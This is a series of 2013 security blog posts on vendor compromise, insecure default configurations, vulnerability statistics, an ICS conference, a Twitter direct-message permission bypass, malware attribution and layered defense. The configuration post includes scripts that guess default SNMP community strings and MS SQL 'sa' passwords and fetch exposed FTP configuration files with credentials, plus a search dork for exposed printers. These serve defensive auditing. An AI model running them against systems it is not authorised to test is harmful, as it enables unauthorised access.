INSIGHTS | February 12, 2013

Do as I say, not as I do. RSA, Bit9 and others…

You thought you had everything nailed down. Perhaps you even bypassed the “best practice” (which would have driven you to compliance and your security to the gutter) and focused on protecting your assets by applying the right controls in a risk-focused manner.

You had your processes, technologies, and logs all figured out. However, you still got “owned”. Do you know why? You are still a little naive.

You placed your trust in big-name vendors. You listened to them, you were convinced by their pitch, and maybe you even put their products through rigorous testing to make sure they actually delivered. However, you forgot one thing. The big-name vendors do not always have your best interest at heart.

Such companies will preach and guide you along the righteous path. However, when you look behind the curtain, the truth is revealed.

The latest Bit9 compromise is not too surprising. Bit9 customers are obviously very security aware, as they opted to deploy a whitelisting product on their computing assets. As such, these customers are most likely high-value targets for adversaries. With that acute security awareness, these customers probably have more security measures and practices in place to protect themselves from attackers. In other words, if I were to scope out such a target for an attack, I would have to focus on supply chain elements that are weaker than the target itself (much in the same manner we teach in our Red-Team Testing classes).

RSA was such a target. There were others. Bit9 was likewise targeted as a stepping stone to some of its customers.

Color me surprised.

If you are a vendor that gloats over the latest compromise, please do not bother. If you have not gone through a similar threat model, either your products are not good enough (hence your customers are not high-value targets), or your own security is not up to speed and you have not yet realized that you have been breached.

If you are a security consumer and therefore care a bit more, do not make any assumptions about your security vendors. They are not the target. You are. As such, they have more generalized security practices than you do. Account for this in your security strategy, and never fully trust anything outside your span of control. It is your responsibility to hold such vendors to at least their own standard and to demand oversight and proof that they meet it.

 

INSIGHTS | February 6, 2013

The Anatomy of Unsecure Configuration: Reality Bites

As a penetration tester, I encounter interesting problems with network devices and software. The most common problems that I notice in my work are configuration issues. In today’s security environment, we can accept that a zero-day exploit results in system compromise because details of the vulnerability were unknown earlier. But, what about security issues and problems that have been around for a long time and can’t seem to be eradicated completely? I believe the existence of these types of issues shows that too many administrators and developers are not paying serious attention to the general principles of computer security. I am not saying everyone is at fault, but many people continue to make common security mistakes. There are many reasons for this, but the major ones are:

  • Time constraints: This is hard to imagine, because an administrator’s primary job is to manage and secure the network. For example: How long does it take to configure and secure a network printer? If you ask me, it should not take much time to evaluate and configure secure device properties unless the network has significant complex requirements. But, even if there are complex requirements, it is worth investing the time to make it harder for bad guys to infiltrate the network.
  • Ignorance, fear, and a ‘don’t care’ attitude: This is a human problem. I have seen many network devices that are not touched or reconfigured for years and administrators often forget about them. When I have discussed this with administrators they argued that secure reconfiguration might impact the reliability and performance of the device. As a result, they prefer to maintain the current functionality but at the risk of an insecure configuration.
  • Problems understanding the issue: If complex issues are hard to understand, then easy problems should be easy to manage, right? But it isn’t like that in the real world of computer security. For example, every software product or network device is accompanied by manuals or help files. How many of us spend even a few minutes reading the security sections of these documents? The people who are cautious about security read these sections, but the rest just want to enjoy the device or software’s functionality. Is it so difficult to read the security documentation that is provided? I don’t think so. For a reasonable security assessment of any new product or software, reading the manuals is one of the keys to good results. We cannot simply say we don’t understand the issue, and if we ignore the most basic security guidance, then attackers have no hurdles in exploiting the most basic known security issues.

 

Default Configuration – Basic Authentication

 

Here are a number of examples to support this discussion:

The majority of network devices can be accessed using Simple Network Management Protocol (SNMP) and community strings that typically act as passwords to extract sensitive information from target systems. In fact, weak community strings are used in too many devices across the Internet. Tools such as snmpwalk and snmpenum make the process of SNMP enumeration easy for attackers. How difficult is it for administrators to change default SNMP community strings and configure more complex ones? Seriously, it isn’t that hard.
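To make this concrete, here is a minimal sketch of the kind of check an administrator (or an attacker) might run. It assumes the net-snmp snmpwalk tool mentioned above is installed and on the PATH; the target address and community list are illustrative placeholders.

```python
#!/usr/bin/env python3
"""Minimal sketch: try common/default SNMP community strings against a host.
Assumes the net-snmp 'snmpwalk' binary is installed; target and community
list are illustrative placeholders."""
import subprocess

TARGET = "192.0.2.10"
COMMON_COMMUNITIES = ["public", "private", "cisco", "admin"]

for community in COMMON_COMMUNITIES:
    # Ask for sysDescr (1.3.6.1.2.1.1.1.0) over SNMPv2c with a short timeout.
    result = subprocess.run(
        ["snmpwalk", "-v2c", "-t", "2", "-r", "0", "-c", community,
         TARGET, "1.3.6.1.2.1.1.1.0"],
        capture_output=True, text=True,
    )
    if result.returncode == 0 and result.stdout.strip():
        print(f"[!] community '{community}' accepted: {result.stdout.strip()}")
    else:
        print(f"[-] community '{community}' rejected or timed out")
```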

A number of devices such as routers use the Network Time Protocol (NTP) over packet-switched data networks to synchronize time services between systems. The basic problem with the default configuration of NTP services is that NTP is enabled on all active interfaces. If any interface exposed to the Internet listens on UDP port 123, a remote user can easily execute NTP readvar queries using ntpq to gain information about the target server, including the NTP software version, operating system, peers, and so on.
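A minimal sketch of that readvar query, assuming the ntpq utility is installed and using a placeholder address:

```python
#!/usr/bin/env python3
"""Minimal sketch: run the NTP 'readvar' query described above via ntpq.
Assumes the ntpq utility is installed; the target address is a placeholder."""
import subprocess

TARGET = "192.0.2.20"   # NTP server reachable on UDP port 123

# 'rv' (readvar) asks the daemon for its system variables, which typically
# include the ntpd version string, the operating system, and peer details.
result = subprocess.run(["ntpq", "-c", "rv", TARGET],
                        capture_output=True, text=True, timeout=15)
print(result.stdout or result.stderr)
```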

Unauthorized access to multiple components and software configuration files is another big problem. This is not only a device and software configuration problem, but also a byproduct of design chaos, i.e., the way different network devices are designed and managed in their default state. Too many devices on the Internet allow guests to obtain potentially sensitive information through anonymous or direct access. In addition, one has to wonder how well administrators understand and care about security if they simply allow configuration files to be downloaded from their servers. For example, I recently conducted a small test to verify the presence of the file Filezilla.xml, which stores the properties of FileZilla FTP servers, and found that a number of servers allow this configuration file to be downloaded without any authorization or authentication controls. This allows attackers to gain direct access to these FileZilla FTP servers because the passwords are embedded in the configuration files.

 

 

 

FileZilla Configuration File with Password
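As a rough illustration of the check described above, here is a minimal sketch that assumes the requests package; the host and filename are placeholders, and some deployments name the file “FileZilla Server.xml” instead.

```python
#!/usr/bin/env python3
"""Minimal sketch: test whether an FTP server's configuration file can be
fetched anonymously. Host and filename below are illustrative placeholders."""
import requests

url = "http://192.0.2.30/Filezilla.xml"   # hypothetical exposed path

try:
    resp = requests.get(url, timeout=10)
except requests.RequestException as exc:
    raise SystemExit(f"request failed: {exc}")

if resp.status_code == 200 and "FileZilla" in resp.text:
    # Account passwords typically sit inside the downloaded XML.
    print("[!] Configuration file is downloadable without authentication")
else:
    print("[-] File not exposed (or authentication is required)")
```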

It is really hard to imagine that anyone would deploy sensitive files containing usernames and passwords on remote servers that are exposed on the network. What results do you expect when you find these types of configuration issues?

 

XLS File Containing Credentials for Third-party Resources
The presence of multiple administration interfaces widens the attack surface because every interface exposes different attack vectors. A number of network-based devices have SSH, Telnet, FTP, and web administration interfaces. The default installation of a network device activates at least two or three different interfaces for remote management. This allows attackers to attack network devices by exploiting inherent weaknesses in the protocols used. In addition, the presence of default credentials can further ease the process of exploitation. For example, it is easy to find a large number of unmanaged network devices on the Internet without proper authentication and authorization.

 

 

 

Cisco Catalyst – Insecure Interface
How can we forget about backend databases? The presence of default and weak passwords for the MS SQL system administrator (sa) account is still a common configuration found on the internal networks of many organizations. For example, network proxies that require backend databases are often configured with default or weak passwords. In many cases administrators think internal network devices are more secure than external ones. But what happens if an attacker finds a way to penetrate the internal network?
The simple answer is: game over. Integrated web applications with backend databases using default configurations are an “easy walk in the park” for attackers. For example, the following insecure XAMPP installation would be devastating.

 

 

 

XAMPP Security – Web Page
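Returning to the MS SQL ‘sa’ account mentioned above, here is a minimal sketch of a default-credential check an auditor (or attacker) might run against an internal database server; it assumes the pymssql package, and the host and password list are placeholders.

```python
#!/usr/bin/env python3
"""Minimal sketch: test an internal MS SQL server for blank or default 'sa'
passwords. Assumes the pymssql package; host and candidates are placeholders."""
import pymssql

TARGET = "10.0.0.5"
CANDIDATES = ["", "sa", "password", "Password1"]

for pwd in CANDIDATES:
    try:
        conn = pymssql.connect(server=TARGET, user="sa", password=pwd,
                               database="master", login_timeout=5)
    except pymssql.OperationalError:
        print(f"[-] 'sa' login rejected with password {pwd!r}")
        continue
    print(f"[!] 'sa' login accepted with password {pwd!r}")
    conn.close()
    break
```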
The security community recently encountered an interesting configuration issue in GitHub repositories (http://www.securityweek.com/github-search-makes-easy-discovery-encryption-keys-passwords-source-code), which resulted in the disclosure of SSH keys on the Internet. The point is that when you own an account or repository on public servers, all administrator responsibilities fall on your shoulders. You cannot blame the service provider, GitHub in this case. If users upload their private SSH keys to a repository, then whom can you blame? This is a big problem, and developers continue to expose sensitive information in their public repositories, even though GitHub’s documentation shows how to secure and manage sensitive data.
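One low-tech safeguard against that mistake is to scan a working copy for private-key markers before pushing; here is a minimal sketch (the marker pattern is illustrative, not exhaustive).

```python
#!/usr/bin/env python3
"""Minimal sketch: scan a checkout for accidentally added private keys before
pushing to a public repository. The marker pattern is illustrative."""
import os
import re

KEY_MARKER = re.compile(r"-----BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----")

for root, dirs, files in os.walk("."):
    dirs[:] = [d for d in dirs if d != ".git"]      # skip git metadata
    for name in files:
        path = os.path.join(root, name)
        try:
            with open(path, "r", errors="ignore") as handle:
                if KEY_MARKER.search(handle.read()):
                    print(f"[!] possible private key: {path}")
        except OSError:
            continue
```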
Another interesting finding shows that with Google Dorks (targeted search queries), the Google search engine exposed thousands of HP printers on the Internet (http://port3000.co.uk/google-has-indexed-thousands-of-publicly-acce). The search string “inurl:hp/device/this.LCDispatcher?nav=hp.Print” is all you need to gain access to these HP printers. As I asked at the beginning of this post, “How long does it take to secure a printer?” Although this issue is not new, the amazing part is that it still persists.
The existence of vulnerabilities and patches is a completely different issue than the security issues that result from default configurations and poor administration. Either we know the security posture of the devices and software on our networks but are being careless in deploying them securely, or we do not understand security at all. Insecure and default configurations make the hacking process easier. Many people realize this after they have been hacked and by then the damage has already been done to both reputations and businesses.
This post is just a glimpse into security consciousness, or the lack of it. We have to be more security conscious today because attempts to hack into our networks are almost inevitable. I think we need to be a bit more paranoid and much more vigilant about security.

 

 

 

INSIGHTS | February 4, 2013

2012 Vulnerability Disclosure Retrospective

Vulnerabilities, the bugbear of system administrators and security analysts alike, keep on piling up – ruining Friday nights and weekends around the world as those tasked with fixing them work against ever shortening patch deadlines.

In recent years the burden of patching vulnerable software may have seemed to be lessening; and it was, if you go by the annual number of vulnerabilities publicly disclosed. However, if you thought 2012 was a little more intense than the previous half-decade, you’ll probably not be surprised to learn that last year bucked the downward trend and saw a rather big jump – 26% over 2011 – all according to the latest analyst brief from NSS Labs, “Vulnerability Threat Trends: A Decade in Review, Transition on the Way”.

Rather than summarize the fascinating brief from NSS Labs with a list of recycled bullet points, I’d encourage you to read it yourself and to view the video they constructed, which depicts the rate and diversity of vulnerability disclosures throughout 2012 (see the video – “The Evolution of 2012 Vulnerability Disclosures by Vendor”).

I was particularly interested in the Industrial Control System (ICS/SCADA) vulnerability growth – a six-fold increase since 2010! Granted, only 124 of the 5,225 vulnerabilities publicly disclosed and tracked in 2012 (2.4 percent) were ICS/SCADA related, but it’s still noteworthy – especially since I suspect very few of the vulnerabilities in this field are ever disclosed publicly.

Once you’ve read the NSS Labs brief and digested the statistics, let me tell you why the numbers don’t really matter and why the ranking of vulnerable vendors is a bit like ranking car manufacturers by the number of red cars they sold last year.

A decade ago, as security software and appliance vendors battled for customer dollars, vulnerability numbers mattered. It was a yardstick of how well one security product (and vendor) was performing against another – a kind of “my IDS detects 87% of high risk vulnerabilities” discussion. When the number of vulnerability disclosures kept on increasing and the cost of researching and developing detection signatures kept going up, yet the price customers were willing to pay in maintenance fees for their precious protection technologies was going down, much of the discussion then moved to ranking and scoring vulnerabilities… and the Common Vulnerability Scoring System (CVSS) was devised.

CVSS changed the nature of the game. It became less about covering a specific percentage of vulnerabilities and more about covering the most critical and exploitable. The ‘High, Medium, and Low’ of old, got augmented with a formal scoring system and a bevy of new labels such as ‘Critical’ and ‘Highly Critical’ (which, incidentally, makes my teeth hurt as I grind them at the absurdity of that term). Rather than simply shuffling everything to the right, with the decade old ‘Medium’ becoming the new ‘Low’, and the old ‘Low’ becoming a shrug and a sensible “if you can be bothered!”… we ended up with ‘High’ being “important, fix immediately”, then ‘Critical’ assuming the role of “seriously, you need to fix this one first!”, and ‘Highly Critical’ basically meaning “Doh! The Mayans were right, the world really is going to end!”
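For readers who have never looked at the arithmetic behind those labels, here is a minimal sketch of the CVSSv2 base-score formula as published in the FIRST specification; the metric values chosen describe a remotely exploitable, unauthenticated, total-compromise vulnerability.

```python
"""Minimal sketch of the CVSSv2 base-score arithmetic (per the FIRST CVSSv2
specification). Values below describe AV:N/AC:L/Au:N/C:C/I:C/A:C."""

ACCESS_VECTOR = 1.0          # Network
ACCESS_COMPLEXITY = 0.71     # Low
AUTHENTICATION = 0.704       # None required
CONF = INTEG = AVAIL = 0.660 # Complete impact on confidentiality/integrity/availability

impact = 10.41 * (1 - (1 - CONF) * (1 - INTEG) * (1 - AVAIL))
exploitability = 20 * ACCESS_VECTOR * ACCESS_COMPLEXITY * AUTHENTICATION
f_impact = 0 if impact == 0 else 1.176

base_score = round(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact, 1)
print(base_score)   # -> 10.0, the maximum base score
```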

But I digress. The crux of the matter as to why annual vulnerability statistics don’t matter, and will continue to matter less in a practical sense as time goes by, is that they only reflect ‘disclosures’. In essence, for a vulnerability to be counted (and attribution applied) it must be publicly disclosed, and more people are finding it advantageous not to do that.

Vulnerability markets and bug purchase programs – white, gray, and black – have changed the incentive to disclose publicly, as well as limiting the level of information that is made available at the time of disclosure. Furthermore, the growing professionalization of bug hunting has meant that vulnerability discoveries are valuable commercial commodities – opening doors to new consulting engagements and potential employment with the vulnerable vendor. Plus there’s a bunch of other lesser reasons why public disclosures (as a percentage of actual vulnerabilities found by bug hunters and reported to vendors) will go down.

The biggest reason why vulnerability disclosure numbers matter less and less to an organization (and those charged with protecting it) is that the software landscape has fundamentally changed. The CVSS approach was primarily designed for software that was bought, installed, and operated by multiple organizations – i.e., software packages that could be patched by their many owners.

With today’s ubiquitous cloud-based services, you don’t own the software and you don’t have any capability (or right) to patch it. Whether it’s Twitter, Salesforce.com, Dropbox, Google Docs, LinkedIn, or the like, your data and intellectual property are in the custodial care of a third party that doesn’t need to publicly disclose the nature (full or otherwise) of vulnerabilities lying within its backend systems – in fact most would argue that it’s in their best interest to not make any kind of disclosure (ever!).

Why would someone assign a CVE number to the vulnerability? Who’s going to have all the disclosure details to construct a CVSS score, and what would it matter if they did? Why would the service provider issue an advisory? As a bug hunter who responsibly discloses the vulnerability to the cloud service provider you’d be lucky to even get any public recognition for your valuable help.

With all that said and done, what should we take away from the marvelous briefing that NSS Labs has pulled together? In essence, there are a lot of vulnerabilities being disclosed, and the vendors of the software we deploy on our laptops and servers still have a ways to go in improving their security development lifecycle (SDL) – some more than others.

While it would be nice to take some solace in the ranking of vulnerable vendors, I’d be more worried about the cloud vendors and their online services and the fact that they’re not showing up in these annual statistics – after all, that’s where more and more of our critical data is being stored and manipulated.

— Gunter Ollmann, CTO — IOActive, Inc.

INSIGHTS | January 25, 2013

S4x13 Conference

S4 is my favorite conference. This is mainly because it concentrates on industrial control systems security, which I am passionate about. I also enjoy the fact that the presentations cover mostly advanced topics and spend very little time covering novice topics.

Over the past four years, S4 has become more of a bits-and-bytes conference, with presentations that explain, for example, how to upload Trojan firmware to industrial controllers and exposés that cover vulnerabilities (in the “insecure by design” and “ICS-CERT” sense of the word).

This year’s conference was packed with top talent from the ICS and SCADA worlds and offered a huge amount of technical information. I tended to follow the “red team” track, as these talks covered breaking into varying levels of control systems networks.

Sergey Gordeychick gave a great talk on the vulnerabilities in various ICS software applications, including the release of an “1825-day exploit” for WinCC, which Siemens did not patch for five years. (The vulnerability was finally closed in December 2012.)
 

Alexander Timorin and Dmitry Sklyarov released a new tool for reversing S7 passwords from a packet capture. Many industrial controllers share a common weakness: homebrew hashing algorithms and authentication mechanisms that simply fall apart under a few days of scrutiny. Their tool is being incorporated into John the Ripper. A trend in the ICS space seems to be the incorporation of ICS-specific attacks into existing attack frameworks. This makes ICS hacking far more accessible to network security assessors, as well as to the “Bad Guys”. My guess is that this trend will continue in 2013.
Billy Rios and Terry McCorkle talked about medical controllers and showed a Philips XPER controller that they had purchased on eBay. The computer itself had not been wiped and contained hard-coded accounts, as well as trivially exploitable buffer overflow vulnerabilities, all running on Windows XP.
Arthur Gervais released a slew of Schneider Modicon PLC-related vulnerabilities. Schneider’s service for updating Unity (the engineering software for Modicon PLCs) and other utilities used HTTP to download software updates, for example. I was sad that I missed his talk due to a conflict in the speaking schedule.
Luigi Auriemma and his colleague Donato Ferrante demonstrated their own binary patching system, which allows them to patch applications while they are executing. The technology shows a lot of promise. They are currently marketing it as a way to provide patches for unsupported software. I think that the true potential of their system is to patch industrial systems without shutting down the process. It may take a while for any vendor to adopt this technique, but it could be a powerful motivator to get end users to apply patches. Scheduling an outage window is the most-cited reason for not patching industrial systems, and ReVuln is showing that we can work around this limitation.

 

My favorite talk was one that was only semi-technical in nature and more defensive than offensive. It was about implementing an SDL and a fuzz-testing strategy at OSISoft. OSISoft’s PI server is the most frequently used data historian for industrial processes. Since C-level employees want to keep track of how their process is doing, historical data often must be exported from the control systems network to the corporate network in some fashion. In the best-case scenario, this is usually done by way of a PI Server in the DMZ. In the worst-case scenario, a corporate system will reach into the control network to communicate with the PI server. Either way, the result is the same: PI is a likely target if an attacker wants to jump from the corporate network to the control network. It is terrific, and still all too rare, to see an ICS software company sharing its security experiences.

 

Digital Bond provides a nice “by the numbers” look at the conference.
If you are technically and internationally minded and want to talk to actual ICS operators, S4 is a great place to start.
INSIGHTS | January 22, 2013

You cannot trust social media to keep your private data safe: Story of a Twitter vulnerability

I’m always worried about the private information I have online. Maybe this is because I have been hacking for a long time, and I know everything can be hacked. This makes me a bit paranoid. I have never trusted web sites to keep my private information safe, and nowadays it is impossible not to have private information published on the web, such as on social media web sites. Sooner or later you will get hacked; this is a fact.

 

Currently, many web and mobile applications give users the option to sign in using their Twitter or Facebook account. Keeping in mind the fact that Twitter currently has 200 million active monthly users (http://en.wikipedia.org/wiki/Twitter), it makes a lot of sense for third-party applications to offer users an easy way to log in. Also, since applications can obtain a wealth of information from your Twitter or Facebook account, most of the time you do not even need to register. This is convenient, and it saves time signing into third-party applications using Twitter or Facebook.

 

 

Every time I’m asked to sign in using Twitter or Facebook, my first thought is, “No way!”  I don’t want to give access to my Twitter and Facebook accounts regardless of whether I have important information there or not. I always have an uneasy feeling about giving a third-party application access to my accounts due to the security implications.

 

Last week I had a very interesting experience.

I was testing a web application that is under development. This application had an option to allow me to sign into Twitter. If I selected this option, the application would have access to my Twitter public feed (such as reading Tweets from my timeline and seeing who I follow). In addition, the application would have been able to access Twitter functionality on my behalf (such as following new people, updating my profile, posting Tweets for me). However, it wouldn’t have access to my private Twitter information (such as direct messages and more importantly my password). I knew this to be true because of the following information that is displayed on Twitter’s web page for “Signing in with Twitter”:

 

Image 1

 

After viewing the displayed web page, I trusted that Twitter would not give the application access to my password and direct messages. I felt that my account was safe, so I signed in and played with the application. I saw that the application had the functionality to access and display Twitter direct messages. The functionality, however, did not work, since Twitter did not allow the application to access these messages. In order to gain access, the application would have to request proper authorization through the following Twitter web page:

 

Image 2

 

The web page displayed above is similar to the previous web page (Image 1). However, it also says the application will be able to access your direct messages. Also, the blue button is different. It says “Authorize app” instead of “Sign in”. While playing with the application, I never saw this web page (image 2). I continued playing with the application for some time, viewing the functionality, logging in and out from the application and Twitter, and so on. After logging in to the application, I suddenly saw something strange. The application was displaying all of my Twitter direct messages. This was a huge and scary surprise. I wondered how this was possible. How had the application bypassed Twitter’s security restrictions? I needed to know the answer.

 

My surprise didn’t end here. I went to https://twitter.com/settings/applications to check the application settings. The page said “Permissions: read, write, and direct messages”. I couldn’t understand how this was possible, since I had never authorized the application to access my “private” direct messages. I realized that this was a huge security hole.

 

I started to investigate how this could have happened. After some testing, I found that the application obtained access to my private direct messages when I signed in with Twitter for a second or third time. The first time I signed in with Twitter on the application, it only received read and write access permissions. This gave the application access to what Twitter displays on its “Sign in with Twitter” web page (see image 1). Later, however, when I signed in again with Twitter without being already logged in to Twitter (not having an active Twitter session – you have to enter your Twitter username and password), the application obtained access to my private direct messages. It did so without having authorization, and Twitter did not display any messages about this. It was a simple bypass trick for third-party applications to obtain access to a user’s Twitter direct messages.

 

In order for a third-party application to obtain access to Twitter direct messages, it first has to be registered and have its direct message access level configured here: https://dev.twitter.com/apps. This was the case for the application I was testing.  In addition and more importantly, the application has to obtain authorization on the Twitter web page (see Image 2) to access direct messages. In my case, it never got this. I never authorized the application, and I did not encounter a web page requesting my authorization to give the application access to my private direct messages.
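For developers integrating “Sign in with Twitter”, one way to see what access level a token actually ended up with is to call the REST API and inspect the x-access-level response header Twitter returns (read, read-write, or read-write-directmessages). A minimal sketch, assuming the requests_oauthlib package; all credentials below are placeholders:

```python
#!/usr/bin/env python3
"""Minimal sketch: check what access level an OAuth token actually received,
via Twitter's 'x-access-level' response header. Assumes requests_oauthlib;
all credentials are placeholders."""
from requests_oauthlib import OAuth1Session

session = OAuth1Session(
    client_key="APP_CONSUMER_KEY",
    client_secret="APP_CONSUMER_SECRET",
    resource_owner_key="USER_ACCESS_TOKEN",
    resource_owner_secret="USER_ACCESS_TOKEN_SECRET",
)

resp = session.get("https://api.twitter.com/1.1/account/verify_credentials.json")
level = resp.headers.get("x-access-level", "unknown")
print(f"Token access level: {level}")
if "directmessages" in level:
    print("[!] This token can read the user's direct messages")
```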

 

I tried to quickly determine the root cause, although I had little time. However, I could not determine this. I therefore decided to report the vulnerability to Twitter and let them do a deeper investigation. The Twitter security team quickly answered and took care of the issue, fixing it within 24 hours. This was impressive. Their team was very fast and responsive. They said the issue occurred due to complex code and incorrect assumptions and validations.

 

While I think the Twitter security team is great, I do not think the same of the Twitter vulnerability disclosure policy. The vulnerability was fixed on January 17, 2013, but Twitter has not issued any alerts/advisories notifying users.

 

There are likely millions of Twitter users (remember, Twitter has 200 million active users) who have signed in with Twitter to third-party applications. Some of these applications might have gained access, and might still have access, to Twitter users’ private direct messages (after the security fix, the application I tested still had access to direct messages until I revoked it).

 

Since Twitter has not alerted its users of this issue, I think we all need to spread the word. Please share the following with everyone you know:

Check third-party applications permissions here: https://twitter.com/settings/applications

If you see an application that has access to your direct messages and you never authorized it, then revoke it immediately.

 

Ironically, we could also use Twitter to help users. We could tweet the following:

Twitter shares your DMs without authorization, check 3rd party application permissions  https://ioactive.com/you-can-not-trust-social-media-twitter-vulnerable/ #ProtectYourPrivacy (Please RT)

 

I love Twitter. I use it daily. However, I think Twitter still needs a bit of improvement, especially when it comes to alerting its users about security issues when privacy is affected.

 

INSIGHTS | January 21, 2013

When a Choice is a Fingerprint

We frequently hear the phrase “Attribution is hard.” And yes, if the adversary exercises perfect tradecraft, attribution can be hard to the point of impossible. But we rarely mention the opposite side of that coin, how hard it is to maintain that level of tradecraft over the lifetime of an extended operation. How many times out of muscle memory have you absent-mindedly entered one of your passwords in the wrong application? The consequences of this are typically nonexistent if you’re entering your personal email address into your work client, but they can matter much more if you’re entering your personal password while trying to log into the pwned mail server of Country X’s Ministry of Foreign Affairs. People make mistakes, and the longer the timeframe, the more opportunities they have to do so.

This leads me to the recent release from Kaspersky Lab about a malware campaign referred to as “Red October”, which they have attributed to Russian hackers. There are a number of indications pointing to Russian origination, including Russian words in the source code, a trojan dropper that enables Cyrillic before installation, and targets concentrated in Russia’s sphere of influence. Although Kaspersky has avoided naming the sponsor of the campaign as the Russian government, the targets of the malware are strongly suggestive of government sponsorship. The campaign seemed to selectively target governments, diplomatic facilities, defense, research institutes, etc. These are targets consistent with sponsors seeking geo-political intelligence, not criminals seeking profit. Kaspersky hypothesizes that the perpetrators may have collected the data to sell it, but I would argue that this is fallacious. The customer for this information would be a government, and if a government is paying criminals for the information, I would argue that’s state sponsorship.
With that context, the one data point that was most interesting to me in Kaspersky’s release was the inclusion of the word “zakladka”. As Kaspersky mentions in their report, “zakladka” is a Russian word that can mean “bookmark.” In slang it can also mean “undocumented feature,” or a brick with an embedded microphone, like the kind you would sneak into an adversary nation’s embassy.
It’s delightfully poetic, then, that in a piece of malware apparently intended to target embassies, someone (presumably Russian) would choose to name a module “zakladka.” The United States and Russia have a rich history of attempting to bug each other’s diplomatic facilities. As early as 1945 the Soviet Union infiltrated an ingenious listening device into the office of the US ambassador to Moscow, hiding it in a wooden US Seal presented as a gift [1]. By 1964 the Soviets were able to collect extensive classified information from the US embassy through hidden microphones [2]. In 1985 construction work stopped on a new US Embassy building in Moscow after it was determined that the building was so riddled with microphones, which had been integrated into the construction, that it could never be considered secure [3].
Presumably in homage to this history, a programmer decided to name his module of code “zakladka”, which would be included in malware that is effectively the evolution of a microphone hidden in drywall. Zakladka is an appropriate name, but the very elegance with which its name matches
its function undermines the deniability of the malware. In this case, it was a choice made by a programmer years ago, and it has repercussions as forensic experts attempt to unravel the source of the malware today.
It’s a reminder of how humans make mistakes. Defenders often talk about the difficulty of attribution, but as the offense we seldom talk about the challenge in gaining and maintaining network access on a target system while remaining totally unnoticed. We take it for granted.
Seemingly innocuous decisions made days, weeks, or months ago can unravel what was otherwise sound tradecraft. In this case, I just found it fascinating that the choice of name for a module–an elegantly appropriate choice–can be as strong a fingerprint for attribution as anything else.
INSIGHTS | January 17, 2013

Offensive Defense

I presented before the holiday break at Seattle B-Sides on a topic I called “Offensive Defense.” This blog will summarize the talk. I feel it’s relevant to share due to the recent discussions on desktop antivirus software (AV).

What is Offensive Defense?

The basic premise of the talk is that a good defense is a “smart” layered defense. My “Offensive Defense” presentation title might be interpreted as being about fighting back against your adversaries, much like the Sexy Defense talk my co-worker Ian Amit has been presenting.

My view of “Offensive Defense” is about being educated on existing technology and creating a well-thought-out plan and security framework for your network. The “Offensive” word in the presentation title relates to being as educated as any attacker who is going to study common security technology and know its weaknesses and boundaries. You should be as educated as that attacker to properly build a defensive and reactionary security posture. The second part of an “Offensive Defense” is security architecture. It is my opinion that too many organizations buy a product either to meet minimal regulatory requirements, to apply “band-aid” protection (thinking in a point manner instead of a systematic manner), or because the organization thinks it makes sense even though it has not actually made a plan for it. Many larger enterprise companies have not stepped back and designed a threat model for their network or defined the critical assets they want to protect.

At the end of the day, a persistent attacker will stop at nothing to obtain access to your network and to steal critical information from it. Your overall goal in protecting your network should be to protect your critical assets. If you are targeted, you want to be able to slow down your attacker and the attack tools they are using, forcing them to customize their attack. In doing so, they give away their position, resources, capabilities, and details. Ultimately, you want to be alerted before any real damage has occurred and to have the ability to halt their attempts to exfiltrate any critical data.

Conduct a Threat Assessment, Create a Threat Model, Have a Plan!

This process involves either having a security architect in-house or hiring a security consulting firm to help you design a threat model tailored to your network and assess the solutions you have put in place. Security solutions are not one-size-fits-all. Do not rely on marketing material or sales pitches, as these typically oversell the capabilities of a product. I think in many ways this overselling is how we as an industry have come to rely too heavily on security technologies, assuming they address all threats.

There are many quarterly reports and resources that technical practitioners turn to for advice, such as Gartner reports, the Magic Quadrant, or testing houses including AV-Comparatives, ICSA Labs, NSS Labs, EICAR, and AV-Test. AV-Test, in fact, reported this year that Microsoft Security Essentials failed to recognize enough zero-day threats, with detection rates of only 69%, where the average is 89%. These are great resources to turn to once you know what technology you need, but you won’t know that unless you have first designed a plan.

Once you have implemented a plan, the next step is to actually run exercises and, if possible, simulations to assess the real-time ability of your network and the technology you have chosen to integrate. I rarely see this done, and, in my opinion, large enterprises with critical assets have no excuse not to conduct these assessments.

Perform a Self-assessment of the Technology

AV-Comparatives has published a good quote on their product page that states my point:

“If you plan to buy an Anti-Virus, please visit the vendor’s site and evaluate their software by downloading a trial version, as there are also many other features and important things for an Anti-Virus that you should evaluate by yourself. Even if quite important, the data provided in the test reports on this site are just some aspects that you should consider when buying Anti-Virus software.”

This statement underscores my point that companies should familiarize themselves with a security technology to make sure it is right for their own network and security posture.

There are many security technologies that exist today that are designed to detect threats against or within your network. These include (but are not limited to):

  • Firewalls
  • Intrusion Prevention Systems (IPS)
  • Intrusion Detection Systems (IDS)
  • Host-based Intrusion Prevention Systems (HIPS)
  • Desktop Antivirus
  • Gateway Filtering
  • Web Application Firewalls
  • Cloud-Based Antivirus and Cloud-based Security Solutions

Such security technologies exist to protect against threats that include (but are not limited to):

  • File-based malware (such as malicious Windows executables, Java files, image files, mobile applications, and so on)
  • Network-based exploits
  • Content-based exploits (such as web pages)
  • Malicious email messages (such as email messages containing malicious links or phishing attacks)
  • Network addresses and domains with a bad reputation

These security technologies deploy various techniques that include (but are not limited to):

  • Hash-detection
  • Signature-detection
  • Heuristic-detection
  • Semantic-detection
There are, of course, other techniques that I won’t go into in great detail in this blog, for example:
  • Reputation-based
  • Behavioral-based
It is important to realize that there is no silver bullet defense out there, and given enough expertise, motivation, and persistence, each technique can be defeated. It is essential to understand the limitations and benefits of a particular product so that you can create a realistic, layered framework that has been architected to fit your network structure and threat model. The following are a few example attack techniques against each protection technique and technology (these have been widely publicized):

 

 

For the techniques that I have not listed in this table, such as reputation, refer to my CanSecWest 2008 presentation “Wreck-utation”, which explains how reputation detection can be circumvented. One major example of this is a rising trend in hosting malicious code on a compromised legitimate website or running a C&C on a legitimate compromised business server. Behavioral sandboxes can also be defeated with methods such as time-lock puzzles, anti-VM detection, or environment-aware code. In many cases, behavioral-based solutions allow the binary or exploit to pass through and in parallel run the sample in a sandbox. This allows what is referred to as a 1-victim approach, in which the user receiving the sample is infected because the malware was allowed to pass through. However, if it is determined in the sandbox to be malicious, all other users are protected. My point here is that all methods can be defeated given enough expertise, time, and resources.
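To make the fragility of the simplest of these techniques concrete, here is a minimal sketch of why exact-hash detection is so easy to defeat: appending a single byte to a sample produces an entirely different digest, so a hash blocklist misses the repacked file. The sample bytes and blocklist are illustrative.

```python
#!/usr/bin/env python3
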